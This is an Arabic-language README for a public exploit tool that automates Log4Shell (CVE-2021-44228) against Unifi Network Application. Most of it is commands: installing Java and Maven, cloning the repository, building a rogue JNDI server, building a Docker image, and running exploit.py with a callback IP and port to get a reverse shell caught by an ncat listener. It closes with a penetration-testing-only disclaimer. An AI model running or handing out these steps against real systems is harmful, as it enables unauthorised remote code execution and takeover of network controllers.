
استغلال CVE-2021-44228 في تطبيق Unifi Network Application لتنفيذ التعليمات البرمجية عن بُعد والمزيد.
استغلال CVE-2021-44228 في تطبيق Unifi Network لتنفيذ التعليمات البرمجية عن بُعد والمزيد.
إن إثباتات المفاهيم لهذه الثغرة متفرقة ويجب تنفيذها يدويًا. يقوم هذا المستودع بأتمتة عملية الاستغلال. راجع منشور المدونة أعلاه للحصول على إرشادات حول مرحلة ما بعد الاستغلال.
يمكن استخدام هذا المستودع يدويًا أو باستخدام Docker.
لتنزيل الأداة الاستغلالية وتشغيلها يدويًا، قم بتنفيذ الخطوات التالية. أولاً، تأكد من تثبيت Java و Maven على مضيفك المهاجم. للقيام بذلك باستخدام apt على أنظمة التشغيل المبنية على Debian، قم بتشغيل الأمر التالي:
apt update && apt install openjdk-11-jre maven
استنسخ مستودع GitHub وقم بتثبيت جميع متطلبات Python:
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
&& cd Log4jUnifi && pip3 install -r requirements.txt
من جذر مستودع Log4jUnifi، قم بتجميع مشروع Rogue-Jndi باستخدام الأمر أدناه:
mvn package -f utils/rogue-jndi/
أولاً، تأكد من تثبيت Docker على مضيفك المهاجم. (لن أشرح لك كيفية القيام بذلك)
بعد ذلك، قم بتنفيذ الأمر التالي لاستنساخ المستودع وبناء صورة Docker التي سنستخدمها.
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
&& cd Log4jUnifi && docker build -t log4junifi .
لتشغيل الحاوية، قم بتشغيل أمر مشابه للتالي مع إلحاق علامات سطر الأوامر الخاصة بك. لاحظ أن الحاوية لن تلتقط الصدفة العكسية. تحتاج إلى إنشاء مستمع ncat في جلسة طرفية منفصلة:
docker run -it -v $(pwd)/loot:/Log4jUnifi/loot -p 8090:8090 -p 1389:1389 log4junifi \
-u https://unifi.acme.com:8443 -i 192.168.1.1 -p 4444
usage: exploit.py [-h] -u URL -i CALLBACK -p PORT
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Unifi Network Manager base URL
-i CALLBACK, --ip CALLBACK
Callback IP for payload delivery and reverse shell.
-p PORT, --port PORT Callback port for reverse shell.
احصل على صدفة عكسية باستخدام الأداة المثبتة على نظامك المحلي:
python3 exploit.py -u https://unifi.acme.com:8443 -i 10.10.10.1 -p 4444
هذه الأداة مصممة للاستخدام أثناء اختبار الاختراق؛ استخدام هذه الأداة لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني. تقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام لهذا البرنامج.